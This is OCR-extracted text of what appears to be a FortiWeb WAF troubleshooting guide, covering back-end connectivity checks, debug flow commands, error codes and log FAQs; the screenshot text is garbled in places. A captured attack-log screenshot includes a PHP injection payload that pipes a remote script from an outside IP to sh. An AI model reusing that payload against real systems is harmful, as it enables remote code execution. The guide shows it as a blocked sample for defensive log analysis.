« If server health check is OFF, check the logs on the back-end server (Apache/Nginx logs or other
monitor system) if possible;
« Visit the back-end server continuously from FortiWeb to see if any failures or long response time from
time to time or when the connectivity issue occurs.

You can use curl on FortiWeb back-end shell to visit the back-end server, and check the response
time.

Samples:

curl -o /dev/null -s -w %{time total}\\n http://<back-end server IP>:<port>

curl -v https://<domain/IP>/ -A "check http" -so /dev/null --resolve
<domain>:<port>:<IP> -k -w %{time namelookup}::%{time connect}::%{time
starttransfer}::%{time total}::%{speed download}"\n"

You can run a script on FortiWeb back-end shell (upload the script via System > Maintenance >

Backup&Restore > GUI File Download/Upload > Upload and chmod to add the execute

permission) to visit the back-end server periodically and record the return code&response time.

However, it's not recommended when traffic is heavy.

3. Checkif FortiWweb system has resource shortage;

« Check FortiWeb event logs or other external monitor tools (if available) to confirm if there is any traffic
burst when the issue occurs;

« Check FortiWeb event logs to confirm if there is any high CPU or Memory usage when the issue
occurs; (Log&Report > Event > Filter > Action > check-resource)

Find logs like:

CPU usage too high,CPU usage is 64, process cmdbsvr
« Check if the connection/session/throughput status are overloaded when the issue occurs:

When connection per second or Throughput reaches the performance bottleneck, you may find that
the system CPU usage is near to 100%, thus consider changing to a higher-end platform. But
sometimes if the connection number of TIME_WAIT becomes very large, it means too many sockets
may be occupied and new TCP connections can hardly be established, thus causing performance
decrease or new request failures. In this case, you may consider adding

diagnose policy total-conn-psec list

diagnose policy total-session list

diagnose policy total-traffic http list

Or

/# netstat -antp | grep ESTABLISH | wc -1

19094

/# netstat -antp | grep TIME WAIT | wc -1

38688

/# netstat -nat | awk '{print $6}' | sort | unig -c | sort -r

56338 TIME WAIT
33940 ESTABLISHED
427 SYN_SENT

251 LISTEN

221 FIN WAIT1

196 FIN WAIT2
5 SYN RECV
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1 established)
1 Foreign

Solution

To alleviate or solve such issue, you can increase the maximum number of connection by adding IP
addresses used to connect to the back-end servers:

a. Add secondary IPs to the interface connected to the back-end server:
Secondary IPs are necessary for both below methods.
FortiWeb # sho sys interface port1
config system interface
edit "port3"
set type physical
setip 10.13.4.254/24
set allowaccess ping ssh snmp http https FortiWeb-manager
config secondaryip
edit 1
setip 10.13.4.253/24
next
edit 2
setip 10.13.4.252/24
next
end
end

b. Method 1: Enable ip-src-balance or ip6-src-balance to allow FortiWeb to connectto

back-end servers using multiple IPv4 addresses configured as above.
This is a global option that affects all server policies. FortiWeb uses round-robin algorithm between all
primary&secondary IPs to distribute connections to back-end servers:
config system network-option

set ip-src-balance enable

set ip6-src-balance enable
End
Method 2: Enable client-real-ip and add available secondary IPs configured above to IP
ranges, then traffic matching the specific policy will connect to back-end servers using these
secondary IPs added to IP/IP Range:
To ensure FortiWeb receives the server's response, configure FortiWeb as the back-end server’s
gateway.
This option is available only for Reverse Proxy mode.

FortiWeb # show server-policy policy
config server-policy policy
edit "Test Policy"

set client-real-ip enable
set real-ip-addr 10.13.4.253
next
end

4. Check if there are system crash/coredump when the issue occurs.
5. Check related logs and captured files for further analysis.
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Server-policy outage

1. Check if all services on FortiWeb are not available, including the HTTPS/SSH service to the management
portal, and the HTTP/HTTPS access to the server-policy;

2. Check the system resources especially when the memory size is low (4G or below, or many configuration
entries) or memory usage is abnormal (memory leak or OOM - out of memory);

3. Check if reboot, crash or coredump occurred when the issue happened;

4. Check if any new operation/configuration are performed/added/modified before the issue happened;
Event logs can be checked for configuration change event, while detailed CLIs are not included.

5. Checkiif there is any traffic (CPS/Throughput/Attack) burst or shift when the issue happened;

Traffic burst usually leads to high CPU usage, so you can check the Event logs, nmon records, or 3rd party
network monitoring history to confirm.

6. Check if a high volume of logs generated or sent to FortiAnylazer or other outside log servers (may be CPU
consuming)

Temporary Actions/Solution

« Check the status of proxyd withps | grep proxyd;

o Execute exec session-cleanup (recommended), kill proxyd,orkill dnsproxyd(orfn kill
proxyd on the front CLI) to restart proxyd or other processes.

« Collect system and debug logs for further support analysis:

« Most important system logs can be fetched by one-click download via GUI > System > Maintenance
> Debug > Download:

S02 FortiWeb-AWS FWB-AWSMO1

£ System

Status > |~ Download
Network > ISR Download |
Firewall >

Config

High Avalability
Admin

Debug Symbol File | © Upload

Maintenance v Upload
Backup &Restore

Firmware
System Time
Debug

Please note that you need to enable GUI > System > Config > Feature Visibility > Debug before
seeing such option:
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="= FortiWeb-VM FortiWeb

¥ System ~ “| Feature Visibility

>
Status System Features

Network b3

(+]

Config y B Traffic Mirror

Operation (® Replacement Message for AJAX requests

Config-Synchronization

SNMP

+ NI+

® Firewall

@ Debug

Advanced » WCCP
FortiGuard

Replacement Message

FortiSandbox

Feature Visibility

« Sometimes newly-added debug logs may not be included in the archive file downloaded through
above method, then it's better to check and download such logs via GUI > System > Maintenance >
Backup & Restore > GUI File Download/Upload:

S5 FortiWeb-VM VM .01

& system ~ & | Backup&Restore | FTPBackup  Local Backup & Restore
Status > Bl systemc (Last Backup: Mon Sep 6 23:29:27 2021)
Network > o
Firewall > Restore
Config >
High Availability 5 Backup CLI configuration | Back up Web Protection Profile related configuration
i N Include Machine Learning Data B
Encryption @
Maintenance N

Backup & Restore

Firmware

System Time
& Security Fabric

(& FortiView

GUI File Download/Upload

0 DoS Protection
B IP Protection

FromFile: ~ © Upload

Upload

>

>

Clear All

& User >
& Policy > Partition Last Modify Time Download
= Server Objects > || debug disktxt Wed Sep 8 21:28:11 2021 &
¥ Application Delivery > || core-proxyd-1775-1631136422 Wed Sep 8 21:27:02 2021 = I
& Web Protection > | [ diogtogd Tue Sep 7 16:38:07 2021 *
8 FTP Security > 1| ha_event log Tue Sep 7 16:38:07 2021 &
2 Bot Mitigation >
2 APl Protection > |~ GUIFile Upload

>

>

>

2 Tracking

Similarly, you needs to enable the GUI File Download/Upload via CLI:

config system settings

set enable-file-upload enable

end
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Checking backend server status & issues

1. Check if the server health-check is ON;
Check current server status with diagnose:
diagnose policy backend back-end server list <Server Pool>
FortiWeb # diagnose policy back-end server list root. SP_ 01
policy (SP_01)
server-pool (RS _01) sp 1d(14718170086418654778) :
total = 2
server[0]
server table id: 1
server random id: 14419242131006337869
ip: x.x.x.X
port: 80
alive:
1
session: O
idle: O
status: 1
backup: 0
server[1l]
server table id: 2
server random id: 3111587693898389030
ip: y.y.vy.y
port: 8080
alive:
0
session: 0
idle: 0
status: 1
backup: 0
alive server 1:
server[0]
alive backup server 0:
2. Check event logs for history status if server-pool health check is ON: Add Filter > Action > Check-
Resource. You'll see like this:
Physical Server 1 [3.89.138.120:80] in server pool RS 01 status change from up to
down -
3. If server-pool health check is OFF or you doubt the back-end server status is not stable, you may use curl
to visit the back-end server (IP or FQDN) under FortiWeb root:
/# curl -I http://x.x.x.%x/
/# curl -I https://x.x.x.x/
/# curl -I --recursive https://x.x.x.x/
Note: Using “execute telnettest x.x.x.x:80”under FortiWeb shellor“telnet x.x.x.x:80"
may not work well because the HTTP headers cannot be fully sent and parsed.

4. Check if the request might be limited by “Connection Limit”.

Diagnosing debug flow
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Debugging traffic flow at user level with diagnose commands

The most commonly used diagnose debug flow commands are combined as below:

Reset enabled diagnose settings, turn on debug log output with timestamp

diagnose debug reset
diagnose debug enable
diagnose debug timestamp enable

Add filters and start the flow trace

diagnose debug flow filter flow-detail 7 #Enables messages from each packet
processing module and packet flow traces

diagnose debug flow filter http-detail 7 #HTTP parser details

diagnose debug flow filter module-detail status on #Turn on details from modules
processing the flow

diagnose debug flow filter server-ip 192.168.12.12 #The VIP in RP mode or the real
server IP in TP/TI mode

diagnose debug flow filter client-ip 192.168.12.1 #The client IP

diagnose debug flow trace start

To stop output

diagnose debug flow trace stop
Diagnose debug disable

Debugging traffic flow at kernel level

Change the debug levels in the backend settings, then kernel level debug logs will be recorded in dmesg. This
method is useful to track traffic flow processing in the system kernel.

1) /proc/tproxy/debug # for transparent mode.

« echo "FFFF F" > proc/tproxy/debug: output logs to dmesg with a detailed level
« echo "XXXX F" > proc/tproxy/debug: don’t forget to turn off debug logs

Use the same way to turn on debug logs for reverse-proxy and wcep mode.
Some details:
/var/log# more /proc/tproxy/debug
Debug modules : HOOK4 HOOK6 HASH POLICY
HOOKA4 : for neffilter hook ipv4
HOOKG® : for neffilter hook ipv6
HASH : for tproxy hash
POLICY : for policy management
FFFF : for all above
XXXX: cleanup all above
PASS : for bypass this module in kernel path
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LOIP : for enable / disable local ip filter in hook4
PIP : <PIP [1,0] ip> for only enbale this ip upto proxyd
Debuglevels:1248
1 : for error message
2 : for data packet info
4 : for data following info
8 : for function entry/exit info
Current debug info : FFFF 15, mbypass = 0, sysmode : 2, localip : 0, proxyd-ip : 0.0.0.0
ex : echo "HOOK4 F" > debug > debug
ex : echo "PIP 110.200.2.1" > debug
Example:

[BEGIN] 9/13/2021 23:35:55

/# dmesg

[553897.203831] (tproxy) (/Chroot Build/34/SVN_REPO
CHILD/FortiWEB/kernel/modules/tproxy/tproxy policy.c:433) get vserver
(240.0.0.29), vport(9781), dir(l)

[553897.203834] (tproxy) ====> get vserver (240.0.0.29), vport(9781l), mark
(1835264/1835264), incoming (vzone p3p4 vlan) tcp info : src:
(192.168.11.1:48310), dst:(192.168.11.2:80)

[553897.203836] (tproxy) (465) incoming (vzone p3p4 vlan) tcp info : src:
(192.168.11.1:48310), dst:(192.168.11.2:80) -ipid(63355) iptlen(60) seq
(2348868809) ack seq(0) syn(l) ack(0) fin(0) rst(0) psh(0)

[553897.203838] (tproxy) [fortiweb-tproxy] redirecting: proto 6 192.168.11.2:80 ->
240.0.0.29:9781, 1pid(63355) iplen(60) mark: 1c0100

[553897.203855] (tproxy)

[553897.203855]

[553897.203855] ====> out to client : src:(192.168.11.2:80), dst:
(192.168.11.1:48310)- seq(1319007036) ack seq(2348868810) syn(l) ack(l) £fin(0)
rst (0) psh(0)

[553897.203856] (tproxy) [POST ROUTING]: TO CLIENT OK, 192.168.11.2:80-
>192.168.11.1:48310, todevname:port3vlanl0l, flag 4000

2) /proc/rptproxy/debug #for reverse-proxy mode
Ivar/log# more /proc/rptproxy/debug
Debug modules : HOOK4 HOOK6 HASH POLICY
HOOKA4 : for neffilter hook ipv4
HOOKG® : for neffilter hook ipv6
POLICY : for policy management
FFFF : for all above
XXXX : cleanup all above
PASS : for bypass this module in kernel path
LOIP : for enable / disable local ip filter in hook4
PIP : <PIP [1,0] ip> for only enbale this ip upto proxyd
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Debuglevels: 1248

Current debug info : 0, mbypass =0, sysmode : 2, localip : 0, proxyd-ip : 0.0.0.0
3) /proc/wproxy/debug #for wccp mode
/var/log# more /proc/wproxy/debug
Debug modules : HOOK4 HOOK®6 POLICY

HOOK4 : for neffilter hook ipv4

HOOKG : for netfilter hook ipv4

POLICY : for policy management

FFFF : for all above

XXXX: cleanup all above

PASS : for bypass this module in kernel path
Debuglevels:1248

Current debug info : 0, mbypass =0, sysmode : 1

How to capture network packets in FortiWeb

Capturing network packets is a useful and direct method when troubleshooting network issues, including TCP
connection establishment issues, SSL handshake issues or analyzing HTTP issues.

Usually it’s better to enable diagnose debug flow and capture packets atthe same time, then analyze them
together.

Error codes displayed when visiting server policy

There are some predefined web pages with error codes that will replace HTML pages:

Go to System > Config > Replacement Message, click the Predefined or User Defined items to check details.
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"R FortiWeb-AWS_Cloud WAF1-i-0fc57813635c4¢52b

£ System ~ “ || ReplacementMessage | Managelmages  Disclaimer
Status >
Network > & Return
Firewall >
? Name HTTP Response Code Description Modified
Operation
Config-Synchronization Captcha Enforcement Page 200 Replacement HTML for Captcha Enforcement Page
SNMP Captcha Block Page 200 Replacement HTML for Captcha Block Page
Advanced Attack Block Page 500 Replacement HTML for Attack Block Page
FortiGuard Server Unavailable Message 503 Replacement HTML for Server Unavailable Message
Feature Visibility Login Page 200 Replacement HTML for Authentication Login Page
High Availability > | Token Page 200 Replacement HTML for Token Authentication Page
Admin > RSA SecurID Login Page 200 Replacement HTML for RSA Securl D Authentication Page
Maintenance > RSA SecurID Challenge Page 200 Replacement HTML for RSA Secur|D Challenge Page
& FortiView > Change Password Page 200 Replacement HTML for Change Password Page
& User > Account Lockout Page 500 Replacement HTML for Account Lockout Page
& Policy > - Account Failed Authentication page 500 Replacement HTML for Account Authentication Failed Page

Error code 503 (Server Unavailable)

Possible causes

1. Server Health Check is ON while the back-end server status is Down.
2. Server Health Check is OFF and the back-end server status is Down.
3. When replacemsg-on-connect-failure is enabled, and the back-end server status is unstable, in
this situation the health check is still UP while the connection to back-end server may be failed.
Please note that the predefined HTTP HC is set with Interval 10, Timeout 3, and Retry_Times 3, so the
back-end server status may change from UP to Down in 23 (the 1st HC starts just when back-end server
gets down) or 30 seconds (the back-end server gets down just after the previous HC succeeds).
config server-policy policy
edit "1"
set replacemsg-on-connect-failure enable
set tcp-conn-timeout 10
next
end

4. Server policy uses content routing without setting default and no content route is matched.
Troubleshooting methods

1. How to judge whether the error code 503 is returned by the back-end server or by FortiWeb?
The Response Bytes in Traffic log is usually larger than 1K when it’s from FortiWeb. This is a simple way
(but not always correct) to judge when you cannot see the response page.
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# System > | & | [% Return Code: 503 JOR NOT '@ AddFilter x &
|8 FortiView > "
su # Date/Time Policy Source Destination | Service | Method | Re ~LogDetails tJ
ser > § :
® poi 1 2021/07/2920:23:35 HTTP policy 1162.19.5879 101622204 http  get © Detailed Information
Policy > More Details
&8 Server Objects .2 2021/07/2920:23:35 1162.19.5879 51755219 http  get Date 2021-07-29
) _ Time 20:23:35
= . :23: |
4 Application Delivery s |3 2021/07/2920:23:28 HTTP_policy ®5173.208.236.114  0.0.00 http  connect potey s
& Web Protection s |4 2021/07/2920:22:03 HTTP_policy 13512524448 0000 http  post HTTP Content Routing HTTF
) _ it
4 Bot Mitigation > 1|5 2021/07/2920:21:23 HTTP policy 81448617332 0000 http  get Server Pool HTTH
2 API Protection > |6 2021/07/2920:17:25 HTTP policy 816214212554 00G0 http  get it
Status success
© Dos Protection > |7 2021/07/2920:17:25 HTTP policy 16214212554 0000 http  get Request Bytes 543
B |P Protection > | |8 2021/07/2920:17:01 HTTP_policy B514486.17369  00.00 http  get Response Bytes 57253
ource Country or Region Taly
2 Tracking > 19 2021/07/2920:11:42  HTTP_policy 5173208236114 0000 http  connect Original Source 1162195879
= Machine Learning > |10 2021/07/2920:10:33 HTTP_policy =1852161406 0000 http  get g)err%:::\Source Countryor Region m‘;’
Ll Log&Report ¥ |11 2021/07/2920:07:27 HTTP_policy 109.235.58226  00.0.0 http get HTTP Version 1x
Log Access N i Method get
12 2021/07/2920:03:53 HTTP_policy 117920166147 101622204 http  get HTTP Host wwwitaliait
pHEk 13 2021/07/29 2003:53 17920166147 51755219 http  get URL /uploads/RTEmagicC_madonna_
Event di_campiglio_01.jpg.jpg
14 2021/07/2920:03:52  HTTP_policy 0311015083 101622204 http  get Return Code
Traffic
_ 15 2021/07/29 20:03:52 0311015083 51755219 http  get .
Download > Connection

2. Disable replacement-on-connect-failure
If this option is enabled, when the health check is disabled and the backend server is not responsive,
FortiWeb will send the 503 error code to the client.

When enabled, you should also configure tcp-conn-timeout to specify the timeout value. When the
health check is disabled and the back-end server is not responsive, FortiWeb will wait for such specified
time until it sends the 503 error code.
config server-policy policy
edit "1270571790 api test com"
set replacemsg-on-connect-failure disable
next
end
3. Remove the web protection profile or modules included in the server-policy
4. Bypass waf functions:
config server-policy policy
edit "1270571790 api test com"
set noparse enable
next
end

Please note: do not enable noparse on content routing, otherwise content routing will not work.

Error code 500 (Internal Server Error)

1. This erroris returned w hen the visit is recognized as an attack and denied by WAF modules.

2. Sometimes when WAF features fail to process the traffic flow, for example, when a rewrite/redirect rule is
configured but failed to correctly handle the request, FortiWeb will respond 500. In this situation, please
collect diagnose debug flow logs for further analysis.

Checking Attack/Traffic/Event logs

Log messages often contain clues that can aid you in determining the cause of a problem. FortiWeb appliances
can record log messages when errors occur that cause failures, upon significant changes, and upon processing
events.
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Depending on the type, log messages may appear in either the event, attack, or traffic logs. The FortiWeb
appliance must be enabled to record event, attack, and traffic log messages; otherwise, you cannot analyze the
log messages for events of that type. To enable logging of different types of events, go to Log&Report > Log
Config > Other Log Settings.

During troubleshooting, you may find it useful to reduce the logging severity threshold for more verbose logs, to
include more information on less severe events. To configure the severity threshold, go to Log&Report > Log
Config > Global Log Settings.

FAQ

Why do | not see HTTP traffic in the logs?

Successful HTTP traffic logging depends on both FortiWeb configuration and the configuration of other network
devices. If you do not see HTTP traffic in the traffic log, ensure that the configuration described in the following

tables is correct.

Reverse Proxy mode

Configuration

Logging

Servers

Server policy

Network interfaces

VLANSs (if used)
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What to look for

Ensure logging is enabled and configured.
By default, logging is not enabled.

Ensure that the IP address of your physical server
and the IP address of your virtual server are correct.

Ensure that the server policy associates the
appropriate virtual server with the correct physical
servers (as members of a server pool).

Go to System > Network > Interface and ensure the
ports for inbound and outbound traffic are up.

Use sniffing (packet capture) to ensure that you can
see traffic on both inbound and outbound network
interfaces.

Ensure that the network interfaces are configured
with the correct IP addresses. In a typical
configuration, port1 is configured for management
(web Ul access) and the remaining ports associated
with the required subnets.

Make sure that the VLAN is associated with the
correct physical port (Interface setting).

See

"Configuring logging"
on page 1

"Defining your web
servers" on page 1
"Configuring virtual
servers on your
FortiWeb" on page 1

"Configuring a server
policy" on page 1

"Configuring the
network interfaces"
on page 1

How can | sniff
FortiWeb packets
(packet capture)? on
page 21 (overview)
or Packet capture on
page 29

"Adding VLAN
subinterfaces" on
page 1
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Firewalls & routers Communications between the FortiWeb appliance, "Appendix A: Port
clients, protected web servers, and FortiGuard numbers" on page 1
Distribution Network (FDN) require that any routers
and firewalls between them permit specific protocols
and port numbers.

Load balancers If the load balancer is in front of FortiWeb, the "External load
physical IP addresses on it are the FortiWeb virtual IP  balancers: before or
addresses. If the Load Balancer is behind the after?" on page 1

FortiWeb, the FortiWeb physical server is the virtual
IP for the load balancer's virtual IP.

Web server Ensure that the web server is up and running by Checking routing on
testing it without FortiWeb on the network. page 39

Transparent modes
Configuration What to look for See

. Ensure logging is enabled and configured. "Cor.lfiguring
Logging o logging" on
By default, logging is not enabled.

page 1
"Defining your
web servers"
Server/server Ensure that the configuration for the physical server in the server pool contains on page 1
pool the correct IP address. "Creating a
server pool" on
page 1
. . . . . n f' 1
. Ensure that the server policy associates the appropriate virtual server with the Con |gur|.ngja
Server policy . server policy
correct physical servers (as a member of a server pool).
on page 1
Ensure the v-zone is configured using the correct FortiWeb ports.
In the list of network interfaces (Global > System > Network > Interface), the "Configuring a
Bridge (v- y ’ bridge (V-

Status column identifies interfaces that are members of a v-zone. .\
zone) zone)" on

To ensure that the bridge is forwarding traffic, in the list of v-zones, under

page 1
Interface, look for the status “forwarding” following the names of the ports. 9
VLANS (if Make sure that the VLAN is associated with the correct physical port (Interface Adf:hng VLA’\,I,
. subinterfaces
used) setting).
on page 1
Firewalls & Communications between the FortiWeb appliance, clients, protected web "Appendix A:
servers, and FortiGuard Distribution Network (FDN) require that any routers and Port numbers"
routers i . o
firewalls between them permit specific protocols and port numbers. on page 1
Ensure that the web server is up and running by testing it without FortiWeb on Che.cklng
Web server routing on
the network.
page 39
Offline mode
Configuration What to look for See
Logging Ensure logging is enabled and configured. "Configuring logging" on page 1
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By default, logging is not enabled.

Server/server Ensure that the configuration for the physical server in

pool the server pool contains the correct IP address.
Ensure that the server policy associates the

Server policy appropriate virtual server with the correct physical
servers (as members of a server pool).
Ensure the v-zone is configured using the correct

FortiWeb ports.

In the list of network interfaces (Global > System >
Bridge (v- Network > Interface), the Status column identifies
zone) interfaces that are members of a v-zone.

To ensure that the bridge is forwarding traffic, in the list
of v-zones, under Interface, look for the status
“forwarding” following the names of the ports.
VLANS (if Make sure that the VLAN is associated with the correct
used) physical port (Interface setting).

Use sniffing (packet capture) to ensure that you can

.N etwork see traffic on both inbound and outbound network
interfaces )

interfaces.
Web server Ensure that the web server is up and running by testing

it without FortiWeb on the network.

"Defining your web servers" on page 1
"Creating a server pool" on page 1

"Configuring a server policy" on page 1

"Configuring a bridge (V-zone)" on
page 1

"Adding VLAN subinterfaces" on page
1

"Configuring the network interfaces" on
page 1

How can | sniff FortiWeb packets
(packet capture)? on page 21

(overview) or Packet capture on page
29

Checking routing on page 39

Why do | see HTTP traffic in the logs but not HTTPS traffic?

Use the following steps to troubleshoot HTTPS traffic logging:

1.Ensure FortiWeb has the certificates it needs to offload or inspect HTTPS.

2.Use sniffing (packet capture) to look for errors in HTTPS traffic.

How do | store traffic log messages on the appliance hard disk?

You can configure FortiWeb to store traffic log messages on its hard disk.

In most environments, and especially environments with high traffic volume, enabling this option for long
periods of time can cause the hard disk to fail prematurely. Do not enable it unless it is necessary and disable it

as soon as you no longer need it.

To enable logging to the hard disk via the CLI, log in using an account with either w or rw permission to the

loggrp area and enter the following commands:

config log traffic-log
set disk-log enable

Use the following commands to verify the new configuration:

get log traffic-log
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A response that is similar to the following message is displayed:

status : enable
packet-log : enable
disk-log : enable

Alternatively, use the following command to display a sampling of traffic log messages:
diagnose log tlog show
A response that is similar to the following message is displayed:

Total time span is 39.252285 seconds
Time spent on waiting is 13.454448 seconds
Time spent on preprocessing is 3.563218 seconds
traffic log processed: 69664

where:

« Total time span is the total amount of time of the logd process handle logs (that is, receiving messages from
other process, filtering messages, outputting in standard format, writing the logs to the local database, and
soon).

« Time spent on waiting is the amount of time of the logd process waited to receive messages from other
processes.

« Time spent on preprocessing is the amount of time the logd process spent filtering and formating
messages.

« ftraffic log processed is the total number of logs that the logd process handled in this cycle.

For more information aboutthe config log traffic-loganddiagnose log tlog showcommands,
see the FortiWeb CLI Reference: https://docs.fortinet.com/product/fortiweb/

Why is the most recent log message not displayed in the Aggregated Attack log?

If recent log messages do not appear in the Aggregated Attack log as expected, complete the following
troubleshooting steps:

1.Use the dashboard to see if the appliance is busy.

When FortiWeb generates an attack log, the appliance writes it to and reads it from the hard disk and then
updates the logging database.

The process that retrieves Aggregated Attack log information from the database (indexd) has a lower priority
than the processes that analyze and direct traffic. Therefore, increased demand for FortiWWeb processing
resources (for example, when traffic levels increase) can delay updates to the log.

2.Rebuild the logging database.
Events such as a power outage can corrupt the logging database. Use the following command to rebuild it:

exec db rebuild

Why is the number of cookies reported in my attack log message different from
the number of cookies that message detail displays?

When FortiWeb generates an attack log message because a request exceeds the maximum number of cookies
it permits, the message value includes the number of cookies found in the request. In addition, the message
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details include the actual cookie values.

For performance reasons, FortiWeb limits the size of the attack log message. If the amount of cookie value
information exceeds the limit for cookies in the attack log, the appliance displays only some of the cookies the
message detail.

Why does the attack log message display the virtual server IP address as the
destination IP instead of the IP address of the back-end server that was the
target of the attack?

In some cases, FortiWeb blocks attacks before the packet is routed to a server pool member. When this
happens, the destination IP is the virtual server IP.

How to check attack logs in FortiWeb

Attack logs keep records of the violations of attack policies, such as server information disclosure, attack
signature matches, Dos protection, HTTP protocol constraint, etc.

1. Alog for a php injection sample is as below. You can see the attack types, matched pattern, Signature ID and
Message. Different attack log types may have particular fields.

2. For some types of logs such as signature, you can create an exception rule or do some other operation by
clicking the Message field of attack logs.

FortiWeb-AWS FWB-AWS-M01

¥ System > Attacks | Aggregated Attacks
% Securi i
¥ Security Fabric > zc HxSevemyLevel UInformative % MainType: . | © AddFilter x| | Saved Filter ~ &
& FortiView >
& User R # Date/Time Policy Source Destination | Threat Level Main Type Sub Type Log Details x
: o eorirorserrosm T T oo Too oy S Il = TP TDTU
B Policy > 62 2021/10/0220:13:41 SPO1 EN5824884.102  104.40.29.86 Signature Detection Generic Attacks More Details
& Server Objects 1|63 2021/10/0220:13:41 SPO1 ENS5824884102 104402986 mmErTE  Signature Detection Generic Attacks(Extend gztge 2021-10-02
Application Deli > ) . ;
& Application Delivery 64 2021/10/0220:13:41 SPO1 EN5824884.102 104402986 [immd  HTTP Protocol Constraints Missing POST Content | Time 15:16:36
& Web Protection > , ) Policy sP.01
65 2021/10/0217:58:12 SPO1 ®i209.14151.176 104402986 [==ws]  HTTPProtocol Constraints HTTP Parsing Error Serviee http
& FTP Security > )
66 2021/10/0216:42:48 SP.01 EN222.186.19.235 1044029.86 [Frrrmm HTTP Protocol Constraints  HTTP Parsing Error HTTP Version 1x
< Bot Mitigation > HTTP Host 3.96.215.58:80
67 2021/10/0216:42:48 SPO1 EM222.186.19.235 104402986 [==mm  HTTPProtocol Constraints HTTP Parsing Error Method gt
2 API Protection >
68 2021/10/0215:24:16 SP.01 ==107.189.644  10440.29.86 [r=rmd HTTP Protocol Constraints  HTTP Parsing Error URL /?a=fetch&content=
U DoS Protection > <php>dielshell_exec("wget -0 -
) 69 2021/10/0215:16:36 SPO01 mm62.76.41.46 104.40.29.86 Signature Detection Generic Attacks 194.38.20.199/tf shish"))</php>
B 1P Protect >
rotection - Monitor Mode Disabled
2 Tracking L |70 2021/10/0214:13:48 SPO1 =45.55.60.58 104.40.29.86 Custom Access N/A Ackion Alert.Deny
= A 71 2021/10/0214:13:48 SP01 ®34555.60.58 104.40.29.86 Signature Detection Generic Attacks Threat Level
= Machine Learning > = - , o Client Risk © Malicious
@ WebVunerabilityscan > || 72 2021/10/021413:48 SP.01 =945.55.6058 104402986 EZii=d  HTTPProtocol Constraints - Missing POST Content T | oy rce Country or Region Russian Federation
|ML° P — o |73 2021/10/0214:13:48 SP.01 [545.55.60.58 104.40.29.86 Signature Detection Generic Attacks CVEID N/A
S . o OWASP Top10 A1:2017-Injection
Log Access o |74 2021/10/0214:13:48 SP.01 =14555.60.58 104402986 =i HTTPProtocol Constraints  Missing POST Content 1 | ain Type Signature Detection
75 2021/10/0214:13:48 SPO1 45556058  104.4029.86 Signature Detection Generic Attacks Sub Type Generic Attacks
Signature Subclass Type ~ PHP Injection
Event 76 2021/10/0214:13:48 SP.01 ®34555.60.58 104402986 [=EEE)  HTTPProtocol Constraints Missing POST Content1 | Signature ID 050080043
. ) ) ) ; Message Parameter(content) triggered signature
-
Traffic 77 2021/10/0214:13:48 SP01 ®54555.60.58 104402986 [T7EE  Signature Detection Known Exploits 15050080043 of Sinatarea polies EOP-
Download 78 2021/10/0214:13:48 SP01 ®34555.60.58 10440.2986 [Fm=mmm]  HTTP Protocol Constraints ~ Missing POST Content 1 Signatures
— @ Add Excepti
Report > |79 2021/10/0214:13:48 SP.O1 145556058 104.40.29.86 Signature Detection Generic Attacks xception
] , | Connection @ Alert Only
Log Policy 5o ’ ) )
| el 2o 62.76.41.46:39428 > 1
a < < 1 /44 > > [Tota:4393] = > 1| © Disable Signature M

FortiWeb Trouble-shooting Guide Fortinet Technologies, Inc.



Diagnosing server-policy connectivity issues

& System >
X Security Fabric >
1 FortiView >
& User >
B Policy N
£% Server Objects N
« Application Delivery >
& Web Protection >
8 FTP Security N
28 Bot Mitigation >
2 API Protection >
U DoS Protection >
& |P Protection >
O Tracking N
= Machine Learning >

@ Web Vulnerability Scan >

I Ll Log&Report v
Log Access v
Event
Traffic
Download
Report >
Log Policy >

Q

J Attacks | Aggregated Attacks

x| SavedFilter~ @

GET /2a=fetch&content=<php>die(shell_exec("wget -q -0 - 194.3

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
bKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/5

Value

<php>die(shell_exec("wget -q -O - 194.38.20.

199/tfsh|sh"))</php>

2 | [ % Severity Level: !Informative % MainType: .. © AddFilter
# Date/Time Policy Source Destination | Threat Level Main Type Sub Type Log Details
I B e R
62 2021/10/0220:13:41 SP.01 @Em58248.84.102  104.40.29.86 Signature Detection Generic Attacks wm62.76.41.46:39428 -> 104.40.29.86:80
63 2021/10/0220:13:41 SP.O1 EN5824884102 104402986 [mmE=EE  Signature Detection Generic Attacks(Extend
64 2021/10/0220:13:41 SP.O1 EM5824884102 104402986 [rriEE HTTP Protocol Constraints  Missing POST Content 1 :\‘:T'::;f‘"em
65 2021/10/0217:58:12 SPO1 m5209.14151.176 104402986 [m=md  HTTP Protocol Constraints HTTP Parsing Error
66 2021/10/0216:42:48 SPO1 EN222.18619.235 104402986 [rmmmd  HTTP Protocol Constraints HTTP Parsing Error © Packet Header
67 2021/10/0216:42:48 SPO1 EN222.18619.235 104402986 [rmmmd  HTTP Protocol Constraints HTTP Parsing Error
68 2021/10/021524:16 SP.O1 =107.189.644 104402986 [==med  HTTP Protocol Constraints HTTP Parsing Error 820199/his)</php> HITP/L1
Host: 3.96.215.58:80
69 2021/10/0215:16:36 SP.O1 wm62764146 104402986 Signature Detection Generic Attacks
70 2021/10/0214:13:48 SP.O1 Wa455560.58 104402986 Custom Access N/A
71 2021/10/0214:13:48 SP.O1 ma45556058 104402986 Signature Detection Generic Attacks Connection: close
72 2021/10/0214:1348 SP.O1 845556058 104402986 [iimEd  HTTP Protocol Constraints  Missing POST Content1 | |Accept-Encoding: gzip
73 2021/10/0214:13:48 SP.O1 ma45556058 104402986 Signature Detection Generic Attacks
74 2021/10/02 14:13:48 SP.01 54555.60.58 104402986 F===5  HTTP Protocol Constraints  Missing POST Content1 || = Frameters
75 2021/10/0214:13:48 SP.O1 ma45556058 104402986 Signature Detection Generic Attacks ) Name fetch
76 2021/10/0214:13:48 SP.O1 EE45556058 104402986 Eiimm  HTTPProtocol Constraints Missing POST Content ||
77 2021/10/0214:13:48 SPO1 WE45556058 104402986 [TiTEE  Signature Detection Known Bxploits
78 2021/10/0214:1348 SPO1 mi45556058 104402986 [iiix  HTTPProtocol Constraints MissingPOST Contentl |
79 2021/10/0214:13:48 SP.O1 Wa45556058 104402986 Signature Detection Generic Attacks .
,
< 1 /4 > > [Tota:4393]

073 el

3. When you encounter SSL handshake issues, you can disable Ignore SSL Errors in Log&Report > Log
Config > Other Log Settings, then check SSL failures in attack log messages:

FortiWeb-AWS
% System >
X Security Fabric >
18 FortiView >
& User >
B Policy >
£% Server Objects >
4 Application Delivery >
& Web Protection >
8 FTP Security N
28 Bot Mitigation >
